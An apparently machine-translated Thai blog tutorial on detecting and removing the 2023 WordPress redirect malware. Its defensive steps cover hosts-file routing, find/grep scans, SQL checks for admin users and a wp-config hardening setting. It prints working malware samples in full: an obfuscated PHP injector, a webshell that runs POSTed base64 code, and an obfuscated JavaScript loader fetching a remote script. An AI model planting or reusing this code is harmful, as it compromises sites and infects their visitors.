แก้ไขการเปลี่ยนเส้นทาง WordPress Hack 2023 (การเปลี่ยนเส้นทางไวรัส)

WordPress เป็นแพลตฟอร์มที่มีคนใช้มากที่สุดอย่างแน่นอน CMS (Content Management System) ทั้งสำหรับบล็อกและร้านค้าออนไลน์เริ่มต้น (พร้อมโมดูล WooCommerce) ซึ่งทำให้ตกเป็นเป้าหมายของการโจมตีทางคอมพิวเตอร์ (การแฮ็ก) มากที่สุด หนึ่งในการดำเนินการแฮ็กที่ใช้มากที่สุดมีจุดมุ่งหมายเพื่อเปลี่ยนเส้นทางเว็บไซต์ที่ถูกบุกรุกไปยังหน้าเว็บอื่น Redirect WordPress Hack 2023 เป็นมัลแวร์ที่ค่อนข้างใหม่ซึ่งมีผลกระทบจากการเปลี่ยนเส้นทางทั้งไซต์ไปยังหน้าเว็บที่เป็นสแปม หรืออาจทำให้คอมพิวเตอร์ของผู้ใช้ติดไวรัสได้

หากเว็บไซต์ของคุณพัฒนาบน WordPress ถูกเปลี่ยนเส้นทางไปยังไซต์อื่น เป็นไปได้มากว่าตกเป็นเหยื่อของการแฮ็กการเปลี่ยนเส้นทางที่มีชื่อเสียงอยู่แล้ว

ในบทช่วยสอนนี้ คุณจะพบข้อมูลที่จำเป็นและเคล็ดลับที่เป็นประโยชน์ซึ่งคุณสามารถกำจัดไวรัสเว็บไซต์ที่ติดไวรัสจากการเปลี่ยนเส้นทางได้ WordPress Hack (Virus Redirect)- คุณสามารถรับข้อมูลเพิ่มเติมหรือขอความช่วยเหลือได้จากความคิดเห็น

การตรวจจับไวรัสที่เปลี่ยนเส้นทางไซต์ WordPress

การลดลงอย่างกะทันหันและไม่สมเหตุสมผลของการเข้าชมเว็บไซต์ จำนวนคำสั่งซื้อที่ลดลง (ในกรณีของร้านค้าออนไลน์) หรือรายได้จากการโฆษณา ถือเป็นสัญญาณแรกที่บ่งบอกว่ามีบางอย่างผิดปกติ การตรวจจับ “Redirect WordPress Hack 2023” (Virus Redirect) ก็สามารถทำได้เช่นกัน “ภาพ” เมื่อคุณเปิดเว็บไซต์และถูกเปลี่ยนเส้นทางไปยังหน้าเว็บอื่น

จากประสบการณ์ที่ผ่านมา มัลแวร์เว็บส่วนใหญ่เข้ากันได้กับอินเทอร์เน็ตเบราว์เซอร์: Chrome, Firefox, Edge, Opera- หากคุณเป็นผู้ใช้ Mac ไวรัสเหล่านี้จะไม่ปรากฏให้เห็นมากนักในเบราว์เซอร์ Safari ระบบความปลอดภัยของ Safari จะบล็อกสคริปต์ที่เป็นอันตรายเหล่านี้โดยไม่แจ้งให้ทราบ

จะทำอย่างไรถ้าคุณมีเว็บไซต์ที่ติดไวรัส Redirect WordPress Hack

ฉันหวังว่าขั้นตอนแรกจะไม่ตื่นตระหนกหรือลบเว็บไซต์ แม้แต่ไฟล์ที่ติดไวรัสหรือไวรัสก็ไม่ควรถูกลบในตอนแรก พวกเขามีข้อมูลอันมีค่าที่สามารถช่วยให้คุณเข้าใจว่าการละเมิดความปลอดภัยอยู่ที่ไหนและสิ่งใดที่ส่งผลต่อไวรัส วิธีการดำเนินการ

ปิดเว็บไซต์สู่สาธารณะ

คุณจะปิดเว็บไซต์ไวรัสไม่ให้ผู้เยี่ยมชมได้อย่างไร วิธีที่ง่ายที่สุดคือการใช้ตัวจัดการ DNS และลบ IP ของมัน “ก” (ชื่อโดเมน) หรือกำหนด IP ที่ไม่มีอยู่จริง ดังนั้นผู้เยี่ยมชมเว็บไซต์จะได้รับการปกป้องจากการแฮ็กการเปลี่ยนเส้นทาง WordPress ที่สามารถนำไปสู่ไวรัสหรือหน้าเว็บสแปม

ถ้าคุณใช้ CloudFlare ในฐานะผู้จัดการ DNS คุณจะลงชื่อเข้าใช้บัญชีของคุณและลบบันทึก DNS “A” สำหรับชื่อโดเมน ดังนั้นโดเมนที่ได้รับผลกระทบจากไวรัสจะยังคงไม่มี IP และไม่สามารถเข้าถึงได้จากอินเทอร์เน็ตอีกต่อไป

คัดลอก IP ของเว็บไซต์และทำ “เส้นทาง” เพื่อให้มีเพียงคุณเท่านั้นที่สามารถเข้าถึงได้ จากคอมพิวเตอร์ของคุณ

คุณจะเปลี่ยน IP จริงของเว็บไซต์บนคอมพิวเตอร์ Windows ได้อย่างไร

วิธีนี้มักใช้เพื่อบล็อกการเข้าถึงบางเว็บไซต์โดยการแก้ไขไฟล์ “เจ้าภาพ”-

1. เปิด Notepad หรือโปรแกรมแก้ไขข้อความอื่น (ด้วยสิทธิ์ของผู้ดูแลระบบ) และแก้ไขไฟล์ “hosts“- ตั้งอยู่ใน:

C:\Windows\System32\drivers\etc\hosts

2. ในไฟล์ “เจ้าภาพ” เพิ่ม “เส้นทาง” ไปยัง IP จริงของเว็บไซต์ของคุณ IP ถูกลบด้านบนจากตัวจัดการ DNS

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. บันทึกไฟล์และเข้าถึงเว็บไซต์ในเบราว์เซอร์

หากเว็บไซต์ไม่เปิดขึ้นและคุณไม่ได้ทำอะไรผิดในไฟล์ “เจ้าภาพ”น่าจะเป็นแคช DNS

หากต้องการล้างแคช DNS บนระบบปฏิบัติการ Windows ให้เปิด Command Prompt ซึ่งคุณรันคำสั่ง:

ipconfig /flushdns

คุณจะเปลี่ยน IP จริงของเว็บไซต์บนคอมพิวเตอร์ Mac / MacBook ได้อย่างไร

สำหรับผู้ใช้ Mac การเปลี่ยน IP จริงของเว็บไซต์จะค่อนข้างง่ายกว่า

1. เปิดยูทิลิตี้ Terminal-

2. เรียกใช้บรรทัดคำสั่ง (ต้องใช้รหัสผ่านระบบจึงจะทำงาน):

sudo nano /etc/hosts

3. เช่นเดียวกับคอมพิวเตอร์ Windows ให้เพิ่ม IP ที่แท้จริงของโดเมน

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. บันทึกการเปลี่ยนแปลง Ctrl+X (y)-

หลังจากที่คุณทำ “เส้นทาง”คุณเป็นคนเดียวที่สามารถเข้าถึงเว็บไซต์ที่ติดไวรัสด้วย Redirect WordPress Hack

เว็บไซต์สำรองข้อมูลเต็มรูปแบบ – ไฟล์และฐานข้อมูล

ถึงแม้จะติดเชื้อก็ตาม. “เปลี่ยนเส้นทางแฮ็ค WordPress”แนะนำให้ทำการสำรองข้อมูลทั่วไปทั้งเว็บไซต์ ไฟล์และฐานข้อมูล อาจเป็นไปได้ว่าคุณสามารถบันทึกสำเนาในเครื่องของทั้งสองไฟล์ได้ public / public_html ตลอดจนฐานข้อมูล

การระบุไฟล์ที่ใช้ไวรัสและไฟล์ที่ถูกแก้ไขโดย Redirect WordPress Hack 2023

ไฟล์เป้าหมายหลักของ Wordpress ฉัน index.php (ในราก) header.php- index.php และ footer.php ของธีม WordPress ที่ใช้งานอยู่ ตรวจสอบไฟล์เหล่านี้ด้วยตนเองและระบุรหัสที่เป็นอันตรายหรือสคริปต์มัลแวร์

ในปี 2023 ไวรัสประเภทหนึ่ง “เปลี่ยนเส้นทางแฮ็ค WordPress” ใส่ใน index.php รหัสของแบบฟอร์ม:

(ฉันไม่แนะนำให้ใช้รหัสเหล่านี้!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

ถอดรหัสแล้วนี่. มัลแวร์สคริปต์ โดยพื้นฐานแล้วมันเป็นผลมาจากการที่เว็บไซต์ WordPress ติดไวรัส ไม่ใช่สคริปต์ที่อยู่เบื้องหลังมัลแวร์ แต่เป็นสคริปต์ที่ทำให้สามารถเปลี่ยนเส้นทางหน้าเว็บที่ติดไวรัสได้ หากเราถอดรหัสสคริปต์ข้างต้น เราจะได้รับ:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

หากต้องการระบุไฟล์ทั้งหมดบนเซิร์ฟเวอร์ที่มีรหัสนี้ การเข้าถึงจะถือเป็นเรื่องดี SSH ไปยังเซิร์ฟเวอร์เพื่อเรียกใช้การตรวจสอบไฟล์และบรรทัดคำสั่งการจัดการบน Linux

ที่เกี่ยวข้อง: คุณจะพบได้อย่างไรว่าคุณมีบล็อกไวรัสหรือไม่ด้วยความช่วยเหลือของการค้นหาของ Google (ไวรัส WordPress)

ด้านล่างนี้เป็นคำสั่งสองคำสั่งที่มีประโยชน์อย่างแน่นอนในการระบุไฟล์ที่แก้ไขล่าสุดและไฟล์ที่มีรหัส (สตริง) บางตัว

คุณเห็นว่าไฟล์ PHP เปลี่ยนแปลงใน 24 ชั่วโมงที่ผ่านมาหรือกรอบเวลาอื่นบน Linux อย่างไร

สั่งการ “find” มันใช้งานง่ายมากและอนุญาตให้ปรับแต่งเพื่อกำหนดช่วงเวลา เส้นทางในการค้นหา และประเภทของไฟล์

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

ในเอาต์พุต คุณจะได้รับข้อมูลเกี่ยวกับวันที่และเวลาที่ไฟล์ถูกแก้ไข สิทธิ์ในการเขียน / อ่าน / ดำเนินการ (chmod) และอยู่ในกลุ่ม / ผู้ใช้ใด

หากต้องการตรวจสอบหลายวันก่อน ให้เปลี่ยนค่า “-mtime -1” หรือใช้ “-mmin -360” เป็นเวลานาที (6 ชั่วโมง)

จะค้นหาโค้ด (สตริง) ภายในไฟล์ PHP, Java ได้อย่างไร

บรรทัดคำสั่ง “หา” ซึ่งคุณสามารถใช้ค้นหาไฟล์ PHP หรือ Java ทั้งหมดที่มีโค้ดบางตัวได้อย่างรวดเร็วดังนี้

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

คำสั่งจะค้นหาและแสดงไฟล์ .php และ .js ซึ่งมี “uJjBRODYsU“-

ด้วยความช่วยเหลือของทั้งสองคำสั่งข้างต้น คุณจะค้นหาได้อย่างง่ายดายว่าไฟล์ใดได้รับการแก้ไขเมื่อเร็วๆ นี้ และไฟล์ใดมีโค้ดมัลแวร์

ลบโค้ดที่เป็นอันตรายออกจากไฟล์ที่ถูกแก้ไขโดยไม่กระทบต่อโค้ดที่ถูกต้อง ในสถานการณ์ของฉัน มัลแวร์ถูกวางไว้ก่อนที่จะเปิด <head>-

เมื่อดำเนินการคำสั่งแรก “หา” ค่อนข้างเป็นไปได้ที่คุณจะพบไฟล์ใหม่ๆ บนเซิร์ฟเวอร์ ซึ่งไม่ใช่ของ WordPress และไม่ได้ใส่ไว้โดยคุณ ไฟล์ที่เป็นของไวรัส Redirect WordPress Hack

ในสถานการณ์ที่ฉันตรวจสอบ รูปร่างไฟล์ปรากฏบนเซิร์ฟเวอร์ “wp-log-nOXdgD.php“- นี่คือไฟล์ “รุ่น” ซึ่งมีโค้ดมัลแวร์ที่ใช้โดยไวรัสเปลี่ยนเส้นทางด้วย

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

วัตถุประสงค์ของประเภทไฟล์ “wp-log-*” คือการแพร่กระจายไวรัสแฮ็กเปลี่ยนเส้นทางไปยังเว็บไซต์อื่นที่โฮสต์บนเซิร์ฟเวอร์ เป็นโค้ดมัลแวร์ประเภทหนึ่ง “webshell” ประกอบด้วย ส่วนพื้นฐาน (ซึ่งตัวแปรที่เข้ารหัสบางตัวถูกกำหนดไว้) และ o ส่วนการดำเนินการ ซึ่งผู้โจมตีพยายามโหลดและรันโค้ดที่เป็นอันตรายบนระบบ

หากมีตัวแปร POST ชื่อ ‘bh‘ และค่าที่เข้ารหัสของมัน MD5 มีค่าเท่ากับ “8f1f964a4b4d8d1ac3f0386693d28d03“จากนั้นสคริปต์จะปรากฏขึ้นเพื่อเขียนเนื้อหาที่เข้ารหัส base64 ของตัวแปรที่มีชื่ออื่น ‘b3‘ ลงในไฟล์ชั่วคราว จากนั้นพยายามรวมไฟล์ชั่วคราวนี้

หากมีตัวแปร POST หรือ GET ชื่อ ‘tick' สคริปต์จะตอบสนองด้วยค่า MD5 ของสตริง “885“-

หากต้องการระบุไฟล์ทั้งหมดบนเซิร์ฟเวอร์ที่มีรหัสนี้ ให้เลือกสตริงที่ใช้ร่วมกัน จากนั้นรันคำสั่ง de “find” (คล้ายกับอันข้างบน) ลบไฟล์ทั้งหมดที่มีรหัสมัลแวร์นี้-

ช่องโหว่ด้านความปลอดภัยถูกใช้ประโยชน์โดยการเปลี่ยนเส้นทางการแฮ็ก WordPress

เป็นไปได้มากว่าไวรัสเปลี่ยนเส้นทางนี้จะมาถึงผ่านทาง การใช้ประโยชน์จากผู้ใช้ผู้ดูแลระบบ WordPress หรือโดยการระบุก ปลั๊กอินที่มีช่องโหว่ ซึ่งอนุญาตให้เพิ่มผู้ใช้ที่มีสิทธิ์ของผู้ดูแลระบบ

สำหรับเว็บไซต์ส่วนใหญ่ที่สร้างบนแพลตฟอร์ม WordPress ก็สามารถทำได้ แก้ไขธีมหรือไฟล์ปลั๊กอินจากอินเทอร์เฟซการดูแลระบบ (Dashboard- ดังนั้นผู้ที่เป็นอันตรายจึงสามารถเพิ่มโค้ดมัลแวร์ลงในไฟล์ธีมเพื่อสร้างสคริปต์ที่แสดงด้านบนได้

ตัวอย่างของโค้ดมัลแวร์ดังกล่าวคือ:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript ระบุไว้ในส่วนหัวของธีม WordPress ทันทีหลังจากเปิดแท็ก <head>-

การถอดรหัส JavaScript นี้ค่อนข้างยาก แต่เห็นได้ชัดว่ามันค้นหาที่อยู่เว็บอื่นจากที่ซึ่งน่าจะดึงสคริปต์อื่นเพื่อสร้างไฟล์ “wp-log-*” ที่เราพูดถึงข้างต้น

ค้นหาและลบรหัสนี้ออกจากไฟล์ทั้งหมด PHP ได้รับผลกระทบ

เท่าที่ฉันสามารถบอกได้รหัสนี้คือ เพิ่มด้วยตนเอง โดยผู้ใช้ใหม่ที่มีสิทธิ์ระดับผู้ดูแลระบบ

ดังนั้น เพื่อป้องกันการเพิ่มโค้ดมัลแวร์จากแดชบอร์ด วิธีที่ดีที่สุดคือปิดการใช้งานตัวเลือกในการแก้ไขธีม / ปลั๊กอิน WordPress จากแดชบอร์ด

แก้ไขไฟล์ wp-config.php และเพิ่มบรรทัด:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

หลังจากที่คุณทำการเปลี่ยนแปลงนี้แล้ว ผู้ใช้ WordPress จะไม่สามารถแก้ไขไฟล์จากแดชบอร์ดได้

ตรวจสอบผู้ใช้ที่มีบทบาทผู้ดูแลระบบ

ด้านล่างนี้เป็นแบบสอบถาม SQL ที่คุณสามารถใช้เพื่อค้นหาผู้ใช้ผู้ดูแลระบบในแพลตฟอร์ม WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

แบบสอบถามนี้จะส่งคืนผู้ใช้ทั้งหมดในตาราง wp_users ที่ได้รับมอบหมายบทบาทผู้ดูแลระบบ แบบสอบถามเสร็จสิ้นแล้วสำหรับตารางด้วย wp_usermeta เพื่อค้นหาเมตา ‘wp_capabilities' ซึ่งมีข้อมูลเกี่ยวกับบทบาทของผู้ใช้

อีกวิธีหนึ่งคือการระบุจาก: Dashboard → Users → All Users → Administrator- อย่างไรก็ตาม มีหลักปฏิบัติหลายประการในการซ่อนผู้ใช้สามารถซ่อนไว้ในแผงแดชบอร์ดได้ ดังนั้นวิธีที่ดีที่สุดในการดูผู้ใช้ “ผู้ดูแลระบบ” จาก WordPress คือคำสั่ง SQL ด้านบน

ในกรณีของฉัน ฉันระบุผู้ใช้ตามชื่อในฐานข้อมูล “wp-import-user“- ค่อนข้างมีการชี้นำ

จากที่นี่ คุณสามารถดูวันที่และเวลาที่สร้างผู้ใช้ WordPress ได้ ID ผู้ใช้ก็มีความสำคัญมากเช่นกัน เนื่องจากจะค้นหาบันทึกของเซิร์ฟเวอร์ วิธีนี้จะทำให้คุณเห็นกิจกรรมทั้งหมดของผู้ใช้รายนี้

ลบผู้ใช้ที่มีบทบาทผู้ดูแลระบบ ซึ่งคุณก็ไม่รู้ เปลี่ยนรหัสผ่าน แก่ผู้ใช้ที่เป็นผู้ดูแลระบบทั้งหมด บรรณาธิการ ผู้เขียน ผู้ดูแลระบบ

เปลี่ยนรหัสผ่านของผู้ใช้ฐานข้อมูล SQL ของเว็บไซต์ที่ได้รับผลกระทบ

หลังจากทำตามขั้นตอนเหล่านี้แล้ว ผู้ใช้ทุกคนจะสามารถรีสตาร์ทเว็บไซต์ได้

อย่างไรก็ตาม โปรดทราบว่าสิ่งที่ฉันนำเสนอข้างต้นเป็นหนึ่งในสถานการณ์หลายพันกรณีที่เว็บไซต์ติดไวรัสแฮ็ก WordPress การเปลี่ยนเส้นทางในปี 2023

หากเว็บไซต์ของคุณติดไวรัสและคุณต้องการความช่วยเหลือหรือมีคำถามใด ๆ ส่วนความคิดเห็นจะเปิดอยู่